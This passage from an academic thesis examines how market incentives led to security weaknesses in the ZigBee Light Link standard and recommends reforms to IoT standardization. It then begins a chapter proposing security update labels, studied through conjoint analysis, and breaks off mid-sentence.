Security economics, which considers decision making in security and privacy based on economic reasoning, play an important role in the IoT. In this chapter, we investigate how economic motivations negatively influenced the security design of the ZigBee standard, and give recommendations for future business-driven IoT standardization efforts.

Contents

6.1 Introduction ...... 105 6.2 Background on ZigBee ...... 106 6.3 Root Cause Analysis ...... 107 6.3.1 Motivation for Standardization ...... 108 6.3.2 ZigBee as Case Study on Security Economics ...... 109 6.4 Implications of Insecure IoT Products ...... 111 6.5 A Road to Improvement ...... 112 6.5.1 Define Precise Security Models ...... 112 6.5.2 Stop Consumer and Business Security Differentiation ...... 112 6.5.3 Add Membership Level for Academic Institutes ...... 113 6.5.4 Conduct Security Testing Without Conflict of Interest ...... 113 6.5.5 Define and Enforce Update Policy ...... 114 6.6 Related Work on Security Economics in IoT Standardization . 114 6.7 Conclusion ...... 115

6.1 Introduction

Standardization efforts play a major role in the expansion of the Internet of Things (IoT) as the success of the IoT is driven by interconnecting a multitude of devices, possibly produced by various manufacturers. This requires manufacturers to agree on common communication protocols at network and application level. Such standardization efforts are mainly fostered by standard developing organizations (SDOs). In the last years, a number of open and market-driven IoT standardization efforts aimed for market domi- nance. In the domain of smart home applications, one of the market leaders is the ZigBee standard, maintained by the ZigBee Alliance, a global non-profit SDO. In this chapter, we consider the ZigBee specifications as a case study to derive lessons about security eco- nomics in market-driven IoT standardization efforts. We chose ZigBee since a number of

105 6 Root Cause Analysis of ZigBee’s Insecurity security weaknesses have been recently revealed in its specifications, and discuss how these weaknesses resulted from design choices made during the standardization process. To define a suitable security architecture, it is important to understand the motivations of both sides, security researchers and manufacturers, because former research [9, 11] has concluded that the academic research community has different priorities in securing technologies than the vendors and consumers. In fact, the economic perspective is often not considered in the security research. Using the lessons from the insecurities of ZigBee as an example, the main goal of this chapter is to raise the understanding on both sides in order to strengthen the security of future IoT standardization efforts. Our contributions are the following: We are the first that analyze root causes that led to the insufficient security architecture of a popular ZigBee application standard. Learning from the security trade-offs made in these IoT specifications, we provide recommendations on how to strengthen security architectures in future IoT standardization efforts. Our re- sults show that the majority of the revealed attacks, which ultimately allow the complete take-over of the target devices, could have been prevented if particular compromises in the security design would have been avoided. We hope that the lessons learned from these security pitfalls raise the attention of manufacturers and SDOs to improve the method- ology in defining security measures in future IoT products. Also, our goal is that the research community gains a deeper understanding about the economic priorities in IoT standardization efforts. The remainder of this chapter is organized as follows. We introduce the background on ZigBee and an overview of its disclosed security vulnerabilities in Section 6.2. In Section 6.3, we present priorities and incentives of standardization efforts, and analyze what went wrong in the ZigBee Light Link standardization. We discuss the benefits of specifying secure IoT systems in Section 6.4, and make recommendations that outline a road to improvement in Section 6.5. We present related work in Section 6.6, and conclude in Section 6.7.

6.2 Background on ZigBee

This section summarizes the background on ZigBee and its security vulnerabilities that we described in detail in Chapter 5. ZigBee is an IoT mesh network and application standard maintained by the ZigBee Al- liance. Popular IoT applications that implement the ZigBee standard include smart home products and smart meters. The ZigBee Alliance is a non-profit SDO and consists of more than 400 member companies [331]. The first ZigBee specifications were released in 2004. In the early years, the approach of the ZigBee Alliance was to bundle application-specific functionality in separate specifications, denoted as application profiles, to meet the needs of particular applications, e.g., connected lighting systems. This approach led to problems of interoperability between smart home products that should cooperate in a joint network but implement different application profiles. The latest specifications, ZigBee 3.0, which

106 6.3 Root Cause Analysis were publicly released in 2016, aim to unify these profiles into one universal standard. In this work, we focus on the ZigBee Light Link specifications for connected lighting. Although these specifications itself are deprecated since 2016, major parts of them are inherited to ZigBee 3.0. In ZigBee, each personal area network (PAN) has its own network key that is shared among all nodes of this network. Implementers of products that follow the ZigBee Light Link specifications can choose between two commissioning procedures to obtain the network key: either classical commissioning or touchlink commissioning. Classical commissioning is suitable if the network is commissioned using a mobile device application and a bridge device. In contrast, touchlink commissioning, which was specifically designed for the needs of connected lighting systems, is utilized for managing a network using a constrained device, such as a remote control. However, a number of security weaknesses have been revealed in both commissioning modes. Zillner and Strobl [337] demonstrated insecurities in the classical commissioning as they exposed that ZigBee-certified products can be forced to encrypt the network key for the over-the-air transmission using a publicly known fallback key. Also, they showed that ZigBee-certified products can be easily reset by sending an unauthenticated reset-to- factory request. In Chapter 5, we analyzed the security of the touchlink commissioning procedure. We showed that this commissioning procedure is insecure by design, allowing attackers to trigger the identify action (e.g., blinking) of ZigBee-certified devices for several hours, and to change their wireless channel (and thus permanently disconnect nodes from their legitimate network) without knowing any key material. In addition, an attacker can passively eavesdrop the network key and take full control over devices since the master key, which protects the network key during the over-the-air transport, was leaked [293]. We demonstrated these vulnerabilities by evaluating popular ZigBee-certified connected lighting systems. In ZigBee 3.0, the mechanisms of the classical commissioning procedure merged with novel features, such as link keys derived from an install code that is printed on the product, into the so-called ‘EZ-mode’ commissioning. EZ-mode is only activated for a short period of time after pushing a button on the product. Thus, the attacks demonstrated by Zillner and Strobl [337] are mainly contained. Also, the ZigBee 3.0 specifications inherited the touchlink commissioning procedure from the ZigBee Light Link specifications with just small adjustments but without replacing the leaked key. Thus, the threats shown in our previous work [213] also affect all products certified for ZigBee 3.0 that enable the optional touchlink commissioning.

6.3 Root Cause Analysis

The security research community has a different perspective on securing IoT technolo- gies than manufacturers since the economic perspective is often not taken into account.

107 6 Root Cause Analysis of ZigBee’s Insecurity

In this section, we outline priorities and incentives of market-driven standardization ef- forts and then analyze what went wrong in the standardization of the ZigBee Light Link specifications.1

6.3.1 Motivation for Standardization

Several analyses (e.g., [25, 113, 104]) outline motivations of manufacturers to participate in strategic alliances, which promote the standardization of novel technologies. A first reason for participation is to decrease market uncertainties since the risks are shared among all participating companies [284, 113]. For the innovator, standardization increases the probability that the own technology succeeds, and it prevents other alliance members from developing competitive (proprietary) systems. In the case of the ZigBee Light Link specifications that define a network and application standard for connected lighting, the ZigBee Alliance started the development of the standard in 2010, with contributions from Philips, Osram, and GE, among others. The ZigBee Light Link technology became a large success since another organization, The Connected Lighting Alliance (TCLA), a non-profit organization promoting the compatibility of wireless lighting, endorsed this standard in July 2013 after studying multiple open standards. A second reason is that members of standardization processes profit from strategic knowl- edge transfer among alliance members [34]. Since multiple manufacturers contribute their know-how to the standardization efforts, alliance members benefit from knowledge spillover, as well as keep track over technical knowledge of their potential competitors [256]. According to the ZigBee Alliance, the contribution of intellectual property to their stan- dards by member companies is very common. As an example of knowledge transfer, the touchlink commissioning procedure, intellectual property of Philips [172], was contributed to the ZigBee Light Link specifications. Access to new markets is a third reason for participation in standardization efforts. Al- liances provide low entry levels for entering foreign markets, i.e., markets that have not been entered by a manufacturer yet [104]. Also making own products compatible to com- plementary products opens new markets, even for small companies. The ZigBee Light Link standard was developed because members of the ZigBee Alliance saw a promising market. Afterwards, further companies that did not participate in the development of these specifications, offered products that complement ZigBee-certified lighting systems, e.g., wireless dimmer switches [35]. To bear the expenses of the organizational overhead of such a strategic alliance, their mem- bers are obligated to pay an annual fee. Usually, SDOs offer several levels of membership that differ in the amount of fee and privileges: the more financial resources a member con- tributes to the alliance, the more influence this member has on the alliance’s final decisions.

1 The authors are not associated with the ZigBee Alliance. The information presented in this case study were obtained by discussions with officials and members of the ZigBee Alliance, publicly accessible information including specifications, and technical inspections of ZigBee-certified products.

108 6.3 Root Cause Analysis

In case of the ZigBee Alliance, three membership levels are offered: adopter ($4k/year), participant ($9.9k/year), and promoter ($55k/year) [335]. While adopters have access to all final specifications and some group events, only participants and promoters can partic- ipate in work groups and propose specifications. Of them, only promoters have the right to finally approve new specifications.

6.3.2 ZigBee as Case Study on Security Economics

From the economic perspective [9, 11], if a standard is aiming for market dominance, then this standard must attract manufacturers of complementary products as well as consumers. These prioritized efforts take much resources, and since resources are finite, they tend to be withdrawn from non-functional features, e.g., comprehensive security measures. At the end, a large amount of resources is spent to develop an attractive system but only a few resources are left to make it secure. In fact, security measures may even make it harder for complementors to build complementary products that support this standard. Therefore, in the first phase of an evolving technology, manufacturers tend to ignore security as they expand their market position. Consumers reward manufacturers for adding functional features to products and being first at the market. On the contrary, the development of an adequate security architecture for these products requires time-consuming testing and might restrict favored functional features. In a latter phase, security measures may be added to lock consumers to the products. These two phases can be seen in the ZigBee Light Link standard.

Phase 1 – Security Design Trade-Offs. The ZigBee specifications prior to ZigBee 3.0 distinguished between home consumer and business applications. In the case of connected lighting systems, the ZigBee Light Link standard was intended to serve the home consumer market, while another ZigBee application profile, the ZigBee Building Automation stan- dard [326], provides functionality for connected lighting systems in business and industrial settings. The significant differences between these two standards can be found in their security architectures. While ZigBee Building Automation follows the ZigBee Pro specifi- cations and offers the full classical commissioning procedure that uses a dedicated device, called Trust Center, for key management [336, p.432], the ZigBee Light Link standard aimed to decrease the complexity of the commissioning in order to increase consumer ac- ceptance. Thus, the classical commissioning procedure in the ZigBee Light Link standard lacks the Trust Center and relies on a global non-disclosure agreement (NDA)-protected master key. Attacks against the classical commissioning procedure are known. These attacks exploit fallback mechanisms that are in place to compensate the lack of the Trust Center [337]. Security weaknesses were also found in the second commissioning mode, the touchlink com- missioning procedure. Touchlink commissioning uses the inter-PAN transmission mecha- nism to join a new device to an existing network, one of the most security-critical opera- tions in ZigBee networks including the transport of the network key to the joining device.

109 6 Root Cause Analysis of ZigBee’s Insecurity

The concept of inter-PAN frames was adopted from the then already existing ZigBee Smart Energy specifications, a profile targeting smart metering applications. The ZigBee Smart Energy specifications define the purpose of inter-PAN transmissions as possibility for ZigBee devices to ‘perform limited, insecure, and possibly anonymous exchange of in- formation’ [328, p.81]. An exemplary application utilizes this transmission mechanism for the ‘market requirement to send pricing information to very low cost devices’, e.g., a refrigerator magnet that displays the current energy prices and consumption. The ZigBee Light Link specifications adopted these inter-PAN transmission mechanism to enable the commissioning of networks with constrained devices. Intended use cases are, e.g., a bulb that should be joined to an existing network using a simple remote control. The adoption of these unauthenticated inter-PAN transmissions to reduce the complexity of commis- sioning procedures, in combination with the usage of signal strength as physical security measure, resulted in the insecurities presented in [213].

Another critical point is the trust in the safe-keeping of master keys that are shared among multiple manufacturers. Both commissioning procedures of the ZigBee Light Link standard rely on an NDA-protected shared key used to encrypt the network key. Although the distributed security global link key (also known as ZLL link key), used for the classical commissioning (and its successor in ZigBee 3.0: EZ-mode commissioning), is not leaked yet, this can happen anytime. NDA-protected keys can indeed leak as demonstrated by the touchlink preconfigured link key (also known as ZLL master key), which was leaked in March 2015 on Twitter [293].

All these security weaknesses, resulting from over-simplified (thus insecure) commissioning procedures including master keys and fallback mechanisms, show that trade-offs have been made at the expenses of a comprehensive security architecture to allow other manufacturers to adopt to this standard easily. At the same time, ZigBee-certified products implementing the more secure ZigBee Building Automation standard have not been released yet. The separation between home consumer and business applications has been discontinued in ZigBee 3.0, while the touchlink commissioning procedure is still an optional feature in ZigBee 3.0.

Phase 2 – Lock the Consumers. In December 2015, Philips (as one of the driving forces behind the ZigBee Light Link standard) assumingly tried to lock consumers more tightly to its products. This happened with an update of the Hue app, which locked out products from other vendors like Osram and GE that are not participating in the ‘Friends of Hue’ certification program. The public sentiment was large such that Philips reverted this decision after a few days through providing a non-scheduled update [235]. Although Philips did not disclose the mechanism how the lock-out was technically implemented, this mechanism can be seen as a security feature that restricts access to the network for white-listed devices.

110 6.4 Implications of Insecure IoT Products

Consumers’ Difficulties with Assessing Security. As described in the economic theory of ‘the market for lemons’ [6], consumers are unwilling to pay for something they cannot assess, such as security [9]. The ZigBee specifications define security measures that are partly very ineffective. But how can a regular consumer determine which level of security is provided by an IoT product? The security of the ZigBee specifications seem solid at first sight as the specifications apply the well-known encryption and authentication scheme AES-CCM. Assuming a shared network key, an attacker without knowledge of this key is not able to decrypt or manipulate AES-CCM-encrypted messages. Nevertheless, as shown in [337, 248, 213], an attacker is able to gain full control of ZigBee-certified products.

6.4 Implications of Insecure IoT Products

So far, it seems that the development of strong security measures in IoT products mainly leads to competitive disadvantages. From an economic perspective, large investments in security are not necessary as the consumers do not reward them. High priorities are being quick-to-market, providing functional features and offering easy integration for comple- mentors. One might assume that investments in security saves money in the long run: Through security breaches, people would lose their trust in the manufacturer and the companies’ reputation decreases. But experiences from the past show that many compa- nies, which have been affected by trust-losing data breaches, do not go out of the business, although they may suffer significant short-term consequences [40, 2, 109, 169]. For exam- ple, security flaws in connected lighting systems (see [337, 248, 213, 63, 43, 122]) have been disclosed almost since the release of these products but none of them really affected the attraction in this technology or its vendors. From the economic perspective of the manu- facturers, there are less benefits in strongly securing IoT devices compared to the benefits that arise from shorter development cycles omitting these security measures. From our point of view, this might change in the future, when people start suing manufacturers of insecure IoT products for financial compensation, or governmental regulations demand comprehensive security levels for market entry. Irrespective of the current situation, we state that manufacturers should take into account ethical considerations and act responsibly. Consumers can be indeed harmed through the insecurities of IoT systems, even by connected lighting systems. Blackouts or unin- tended blinking of lights may not only annoy but also frighten residents. Epileptic seizures can be caused by flickering lights on epilepsy patients [249, 309]. Insecure IoT systems have been used for large denial-of-service attacks against critical infrastructures [161, 12]. Researchers showed that even a single infected light bulb has the potential to serve as incubator to spread malware on IoT systems across large areas [248]. All these threats might endanger humans as well as infrastructure. If manufacturers deny their respon- sibility to protect against such threats, which clearly result from security weaknesses in their products, they might become subjects to class action lawsuits. Recently, there have been several class action lawsuits against manufacturers that acted irresponsibly. Volk-

111 6 Root Cause Analysis of ZigBee’s Insecurity swagen settled a class action lawsuit on its diesel emissions cheating scandal by paying compensations of 14.7 billion USD [266]. Samsung faced class action lawsuits for the slow replacement of its fire-prone mobile phone model [101]. In another class action lawsuit, Ford is alleged of knowingly releasing a flawed infotainment system [159]. These lawsuits have high economic impacts on manufacturers and could have been avoided by taking responsibility seriously.

6.5 A Road to Improvement

We propose five recommendations to strengthen the security design of future IoT stan- dardization efforts.

6.5.1 Define Precise Security Models

During our research, we realized that most specifications of IoT standards do not define a precise security model. The objective of the security model is to formulate against what threats an IoT system should be protected (‘security goals’) and who are the potential attackers (‘attacker model’ or ‘threat model’). In fact, this model formulates the goals of the security design, and therefore, should also be part of the specification. Based on the security model, the security architecture should be developed that considers poten- tial threats comprehensively. Such an architecture provides a significantly smaller attack surface than security architectures designed by experience (or best practices) but without assessing the specific threat conditions of this application. As V. D. Gligor said referring to security models for wireless ad-hoc networks: “A system without an adversary defini- tion cannot possibly be insecure; it can only be astonishing, and of course astonishment is a much underrated security vice” [105]. Exemplary, we reviewed the ZigBee Light Link specifications [327], the ZigBee 3.0 base device behavior and cluster library specifications [330, 332], but also the LoRaWAN [183] and the Bluetooth 5.0 specifications [27] regard- ing security models. These IoT-related standards are widely supported by large alliances and their specifications are released to the public. All these standards lack the definitions of an attacker model as well as the security goals. Although this recommendation de- mands more extensive periods of standard development cycles, the process of developing a security model can be designed in a generic way, such that the resulting model can be adopted to different applications with small effort. The development of the ZigBee Light Link standard took more than two years. Compared to this period of time, the discus- sion and definition of a comprehensive security model should not increase this duration significantly.

6.5.2 Stop Consumer and Business Security Differentiation

As described in Section 6.3, some SDOs tend to distinguish between home consumer and business products. In the ZigBee Light Link standard, the security of home consumer

112 6.5 A Road to Improvement products is based on a weaker security architecture than business products of the compa- rable ZigBee Building Automation standard. If we compare the volume of sold products, then more IoT home consumer products than business IoT products are sold. Gartner predicted the installation of around 7 billion consumer IoT devices compared to 4.2 bil- lion business IoT devices in 2018 [99]. Thus, a security breach of a popular IoT home consumer products would affect millions of devices. However, there is no straight line between consumer and business products in IoT technologies. Although the Philips Hue system is intended for home consumer use, it can also be deployed in an industrial context, e.g., to control workflows [126]. Since many IoT systems offer interfaces for third-party applications, the implementation of consumer products in industrial processes is a simple and inexpensive option. In the case of connected lighting systems based on ZigBee Light Link, another reason might be that there exists no business product (based on the ZigBee Building Automation standard) that offers similar functionalities and flexibility to the best of our knowledge. Thus, we state that the IoT demands high security standards for both, consumer and business products.

6.5.3 Add Membership Level for Academic Institutes

We counted the contribution of academic researchers to popular IoT-related standards and assessed exemplary the IoT standards mentioned in Section 6.5.1. In none of these specifications, academic institutes are listed as contributors, except Bluetooth 5.0 states contributions by the University of Bonn (and NIST). Manufacturers have extensive experi- ence in the aspects of functionality and the needs of the market, which are very important insights. Moreover, we assume that they employ experienced security engineers. How- ever, corporate security engineers might be too much aware of the business goal trade-offs involved in the security design. This conflict of interest may make it difficult for them to insist upon meeting strong security goals. Therefore, an outside view of the academic researchers can help in two ways: (1) to better appraise the probabilities of attacks and consequences of insecure design and (2) to integrate innovative research solutions into the security design. To achieve academic participation, SDOs should lower the barriers for contribution, e.g., by introducing a membership level for (selected) academic institutes that allows (and potentially pays) academic experts to participate in work groups. While fostering academic participation requires investments in selecting and hiring academic ex- perts, the opportunity of knowledge spillover from academic research can be a valuable enrichment to standardization efforts.

6.5.4 Conduct Security Testing Without Conflict of Interest

During the final certification process of the product, not only the functionality of the product should be tested for compliance. Also the implementation of the security archi- tecture in software and hardware should be evaluated with code audits and security-focused penetration tests by external certification labs. Certain attacks [248, 213] on connected

113 6 Root Cause Analysis of ZigBee’s Insecurity lighting systems exploited implementation bugs that could have been avoided through ex- ternal security testing. However, security testing has potential points of failure: Previous investigations [217, 177] showed that vendors often prefer testing and certification labs that perform a relaxed evaluation. Also, testing labs might lose customers if they are too strict and delay the release of products since their competitors might be more easy- going. Thus, mechanisms must be in place that precisely define the scope of evaluation, the exact testing procedures, and punishment for certification labs that fail to fulfill these requirements. To put the SDO in charge of supervising the certification labs leads to a conflict of interest. The SDO’s economic interest is to bring products fast to the market to gain market dominance, which corrupts the motivation for a comprehensive and time- consuming security testing. Therefore, an independent entity that is not influenced by economic motivations must be in charge to supervise the certification labs. The conduc- tion of these security penetration tests will most likely increase costs and demands more extensive periods of product development cycles but finally also reduces the probability of expensive replacement and patching of installed devices.

6.5.5 Define and Enforce Update Policy

During the standardization process, not only security mechanisms against currently known attacks should be considered but also the possibility of upgrading security mechanisms in case novel attacks are disclosed, implementation bugs are discovered, or more efficient se- curity measures have been found. While most current IoT standardization efforts consider update mechanisms, an update policy is usually not defined by the SDO. The update policy defines under what circumstances a product needs to be updated and within which time frame. In addition, this policy should define who takes responsibility for updates if the vendor is not able to deliver them anymore. If such an update policy is in place (and executed), then the security of the IoT application should be ensured for its full lifetime. The problem of such an update policy is the enforcement: what should be the motiva- tion of the manufacturer to update its legacy products? From the economic perspective, why should companies invest money if there is no profit? Thus, the motivation must be extrinsic. A regulatory paradigm shift might be necessary such that only lifetime security- providing vendors gain access to the markets. For instance, manufacturers that fail to fulfill their duties in terms of providing updates for their products would not be allowed to receive the certification for the release of new products. The SDO cannot be trusted with the enforcement of such an update policy due to its conflict of interest. Hence, an independent entity, which is not driven by economic motivations, is required to enforce this policy.

6.6 Related Work on Security Economics in IoT Standardization

Research on security economics in IoT and standardization gained little attention so far. In terms of distributed systems, Anderson and Fuloria [10] investigated the security economics

114 6.7 Conclusion of electricity metering. Murdoch et al. [217] analyzed reasons why certified products fail to fulfill standardized security requirements. Lev¨aet al. [176] proposed a framework to analyze the economic feasibility of protocols during standard development. Ray et al. [241] outlined trade-offs between energy and security constraints in the IoT ecosystem. Leverett et al. [177] described problems and opportunities regarding the standardization and certifications of IoT applications in terms of safety, security, and privacy. Focusing on the European Union, they proposed to establish institutional resources for regulators and policy-makers. In contrast to our approach, Leverett et al. proposed actions at state-level, while our work investigates the security economics of IoT standardization efforts in the private sector. To the best of our knowledge, we are the first that investigate root causes of insecurities in a specific IoT standard. Learning from them, we deduct lessons about security economics in IoT standards and recommend principles to improve the outcome of future IoT standardization efforts.

6.7 Conclusion

In the past years, security weaknesses were disclosed in ZigBee specifications, one of the most popular IoT standards in the domain of smart homes: from leaked master keys and fallback mechanisms to unauthenticated command messages. Similar flaws are not only specific to ZigBee but also in other IoT standards, e.g., Bluetooth Low Energy [252]. Learning from the security pitfalls of the ZigBee specifications, we analyzed the root causes for these insecurities and found them in the prioritization of market aspects over a comprehensive security design. More focus on designing security measures during IoT standardization efforts is needed to protect against the rising threats that result from billions of interconnected IoT devices.

115 116 Chapter 7

Security Update Labels

After investigating IoT security economics in Chapter 6, we propose an approach to over- come the asymmetric information regarding security properties of IoT consumer products between consumers and manufacturers. The objective is to make security an intuitive and comparable feature that can be considered during buying decisions, and as a consequence, has the potential to create incentives for manufacturers to spend more effort on sustain- able security. In this chapter, we present our approach and examine the impact with an empirical user study.

Contents

7.1 Introduction ...... 118 7.2 Background and Related Work ...... 120 7.2.1 Product Labeling ...... 120 7.2.2 Security & Privacy Labels and Regulatory Approaches ...... 121 7.2.3 Conjoint Analysis ...... 122 7.3 Security Labels for Consumers ...... 122 7.3.1 Security Scales for Labeling ...... 123 7.3.2 Security Update Labels ...... 123 7.3.3 An Idea for a Regulatory Framework ...... 124 7.3.4 Concerns towards Security Update Labels ...... 125 7.4 Concept of User Study ...... 126 7.5 Preliminary Studies ...... 128 7.5.1 Prestudy 1: Selection of Product Categories ...... 128 7.5.2 Prestudy 2: Definition of Product Attributes and Levels ...... 132 7.6 Conjoint Analysis ...... 136 7.6.1 Method ...... 136 7.6.2 Pilot Study ...... 138 7.6.3 Sample Size ...... 139 7.6.4 Sample Characteristics ...... 139 7.6.5 Results ...... 139 7.6.6 Validity ...... 142 7.6.7 Segmentation ...... 145 7.7 Discussion ...... 147 7.8 Conclusion ...... 149

117 7 Security Update Labels

7.1 Introduction

Recent academic and industrial user studies [322, 199, 121] document various security concerns regarding the usage of IoT products. These concerns may be fostered by al- most daily headlines about revealed security flaws in IoT products. At least since the denial-of-service attacks against Internet infrastructure by the Mirai botnet [12] in 2016, security experts have started to demand regulatory interventions. “Our choice isn’t be- tween government involvement and no government involvement”, says Bruce Schneier in his testimony before a committee of the U.S. House of Representatives [263], “Our choice is between smarter government involvement and stupider government involvement”. Current policy approaches in the U.S. include a bill for establishing guidelines for the acquisition of secure IoT products by governmental agencies [307] as well as a Californian bill [36] obligating manufacturers to equip IoT devices with reasonable security features. In the EU, baseline security recommendations for IoT were published by the European Union Agency for Network and Information Security (ENISA) [79]. A task force from academia, industry, and societal organizations proposed a policy for vulnerability disclosure in the EU that also concerns IoT products [42]. The problem of deficient IoT security can be at least partly attributed to missing eco- nomic incentives for manufacturers. To be successful on the market, manufacturers have to attract consumers and complementors [9, 11]. Consumers reward an early market entry and new functional features, while complementors favor systems that allow easy compati- bility with their products. These demands contradict comprehensive security design that usually adds complexity to systems. In addition, releasing an innovative product to the market requires many resources, and since resources are finite, they are withdrawn from non-functional features, such as comprehensive security mechanisms [208]. The missing incentivization of security in IoT consumer products originates from the consumers’ inability to assess and compare security properties of different products. The concept of an asymmetric information barrier between buyers and sellers, which also affects other properties such as energy consumption and product quality, is known in the economic theory as ‘the market for lemons’ [6]. This theory states that consumers are not willing to pay a price premium for something they cannot measure. This applies to security in IoT consumer products: In contrast to the so-called search features that can be evaluated by consumers during the buying decision, security is an experience feature that can only be discovered during the usage of a product [219]. In fact, even manufacturers might not have the complete knowledge about the strength of their products’ security [11]. Reasons might be a lack of experience in designing Internet-connected technologies or the outsourcing of a product’s security development to original equipment manufacturers (OEMs). Firstly, we propose and examine mandatory security update labels, a novel idea for a regu- latory framework that complements ongoing regulation efforts. We do not call for security testing and certification to keep “insecure” products off the market. Instead, we explore to which extent market forces can be utilized to elicit manufacturers to continuously and sustainably support their products’ software with security updates. Security update labels

118 7.1 Introduction enable an informed choice regarding security properties of IoT consumer products. They transform the asymmetric information about the manufacturer’s willingness to provide security updates into two intuitively assessable and comparable product attributes: avail- ability period, i.e., for how long the manufacturer guarantees to provide security updates (e.g., ‘until 12/2016’), as well as provisioning time, i.e., within which timeframe after a vulnerability notification a security patch is provided (e.g., ‘within 30 days’). These labels are inspired by established regulations, e.g., in the domain of energy efficiency labeling.

Secondly, we empirically examine the impact of security update labels on the consumers’ choice. Although security patching is discussed by experts as one of the most effective countermeasures against insecure IoT devices, the impact of guaranteeing security updates on the consumers’ buying decisions has not been empirically assessed so far. With an interdisciplinary team consisting of researchers from the domains of IoT security, human factors in security, marketing research, and psychology, we conducted a user study with more than 1,400 participants that measured the relative importance of the availability period and provisioning time of security updates for buying decisions. To this end, we used conjoint analysis, a well-established method in marketing research [110, 312], which has also been used in courts to calculate damages of patent and copyright infringements [118]. In a nutshell, a number of fictitious product profiles, each described by a set of attributes, is shown to respondents in multiple iterations. They are asked which of the presented products they would prefer to buy (with the option to refuse buying any of the products). Based on these choice results, conjoint analysis determines a preference model that measures the relative importance and utility of each attribute.

We found that the guarantee of providing security updates has a high impact on buy- ing decisions. We examined two product categories, one with a high and one with a low perceived security risk. Among all assessed product attributes, the availability period of security updates was the most important one: For the product with the high perceived security risk, its relative importance on the overall consumers’ choice of 31% is at least twice as high as the importance of other attributes. For the product with the low per- ceived security risk, availability had a lower relative importance of 20% for the consumers’ choice. Additionally, consumers prefer a shorter provisioning time (10 days) over a longer provisioning time (30 days), and dislike longer provisioning times for products with a high perceived security risk. Demographic characteristics play a minor role, while the sensitivity for security risks has an impact on the consumers’ choice.

In summary, we propose and empirically analyze security attributes for IoT consumer products that are recognized by consumers and do not require third-party product testing. With this work, we address policymakers and security researchers that are seeking for promising directions to foster sustainable security efforts for IoT consumer products.

The remaining part of this chapter is organized as follows: In Section 7.2, we introduce the background on product labeling and conjoint analysis as well as present related work. Then, we describe and discuss the idea of security update labels in Section 7.3. In Sec- tion 7.4, we outline the concept of the user study that we conduct to assess the impact of

119 7 Security Update Labels the security update labels. The user study consists of two prestudies that are described in Section 7.5 and a conjoint analysis presented in Section 7.6. We discuss the results of the user study and their implications in Section 7.7. We conclude this chapter in Section 7.8.

7.2 Background and Related Work

We provide background and related work on product labeling, privacy labels, and conjoint analysis in this section.

7.2.1 Product Labeling Product labeling is used in many countries to inform consumers about intangible features of products and to enable comparison of products during buying decisions. Hereby, a distinction between marks and labels should be made: Marks are usually pictograms that warn about danger or indicate proper usage, cleaning, and recycling of a product. In contrast, labels include scales, descriptions, and numeric statements that provide specific information about the products properties. In many cases, these signs are demanded by policy makers, but in some cases they are voluntary and used as marketing tools. The Federal Trade Commission (FTC) issues product labeling policies in the USA, while each member state of the EU runs its own institution that enforces regulations defined by the EU Commission. In the past, a number of product labeling policies have been intro- duced to reduce information asymmetries between manufacturers and consumers. Promi- nent examples are energy labels that inform about the energy consumption of particular products. In the USA, designated electronic products, e.g., light bulbs, televisions, and household appliances, must be tagged with labels as exemplarily depicted in Figure 7.1a, that show the energy consumption and the estimated annual operating costs. These labels have been introduced by the FTC with the Energy Labeling Rule [88], a part of the Energy Independence and Security Act of in 2007 [179]. In 2010, The EU followed with a similar approach by introducing the Energy Efficiency Directive [76] that demands energy labels, as exemplarily shown in Figure 7.1b, for certain product categories. The EU energy labels are part of the efforts to foster energy-efficient products with the objective to reduce the overall energy consumption of the EU by 20% until 2020 [75]. Prior research on the ef- fectiveness of energy labeling [310, 304, 255] concluded that consumers are aware of these labels, understand them, and that energy labels influence consumers’ buying decisions. Inspired by the EU energy labels (cf. Figure 7.1b), the German government [84] evaluated an idea of lifetime labels on electronic products. Their label design showed a color-gradient lifespan between 0 (red) and 20 (green) years. In a user study with a representative sample, discrete-choice experiments (but not conjoint analysis) simulated online shopping scenarios. The authors concluded that while the lifespan attribute was recognized by consumers, its impact on the buying decisions was less than the impact of other product attributes, e.g., price and brand. In contrast to our approach, their label did not concern security features, but the functional lifespan of a product.

120 7.2 Background and Related Work

Y IJA IE IA

A++ + A+ A A B C D E

(a) FTC Energy Label (b) EU Energy Label

Figure 7.1: Examples of mandatory product labels

7.2.2 Security & Privacy Labels and Regulatory Approaches

In the academic research, the adaption of product labels for privacy information was examined in user studies. Kelley et al. [149, 150] investigated whether food nutrition labels can be adapted to make privacy policies of websites more understandable. Tsai et al. [291] evaluated whether consumers would pay a higher price for a product offered by an online shop with a strict privacy policy as compared to a less privacy-protecting shop. Their results suggest that consumers are willing to pay a price premium for higher privacy if privacy information is salient and understandable. Independently and concurrently to our work, Emami-Naeini et al. [74] developed a security and privacy label for IoT consumer products. In contrast to our proposal, their label includes ratings that require third-party product testing before release. They tested their label in an interview study with 24 users and a survey with 200 respondents. Emami- Naeini et al. did not conduct a conjoint analysis but directly asked the users to rate the importance of security and privacy on their buying decisions. They concluded that importance of security and privacy depends on the product category: whereas they are important when buying a home camera or a smart thermostat, they are not important when buying a smart toothbrush. We found a similar effect in our study. Our and their studies complement and validate each other’s results using different methods. Mandatory security update labels represent a possible approach to regulate the IoT prod- uct market with regard to security. Chattopadhyay et al. [44] consider this economic problem in more depth and analyze the impact of various regulation strategies on con- sumers’ behavior.

121 7 Security Update Labels

7.2.3 Conjoint Analysis

Conjoin analysis is one of the major methods to measure the impact of product attributes on the consumers’ buying decisions [103]. The basic idea of conjoint analysis is that respondents are asked to state their preference for buying fictitious products. The product profiles are described by a limited set of attributes, e.g., size, color, and price. All further attributes of the product are assumed to be constant. There are different types of conjoint analysis. Among them, choice-based conjoint (CBC) is used in 79% of the conjoint surveys [227]. In CBC, which we use in this work as well, the respondents receive multiple (usually randomly generated) subsets of 3 to 5 product profiles (so-called choice sets), of which they select the most desirable product. Considering the overall preference (i.e., combination of all buying decisions) as dependent variable and the attributes of the product as independent variables, a conjoint analysis assesses the relative importance of product’s attributes. For example, relative importance of the attribute ‘color’ for buying decisions can be assessed. Conjoint analysis also eval- uates the importance of the different characteristics of a single attribute, e.g., whether the change of a product’s color would have positive or negative effects on the consumers’ choice. In the past decades, conjoint analysis has been applied to numerous commercial projects [303] and is by far the most widely-used methodology in marketing research to analyze consumer trade-offs in buying decisions [110]. Conjoint analysis is also used in other areas, e.g., to assess the patients’ preferences in the healthcare sector [251]. Furthermore, it is a recognized methodology to calculate damages of patent and copyright infringement in court cases [118]. A famous example was Apple’s $2.5 billion law suit against Samsung, in which Apple estimated the financial damages of the alleged patent infringement based on conjoint analysis [261]. Conjoint analysis has also previously been used to investigate the effects of product la- bels [60, 67, 125] on the consumers’ choice. Sammer and W¨ustenhagen[255] 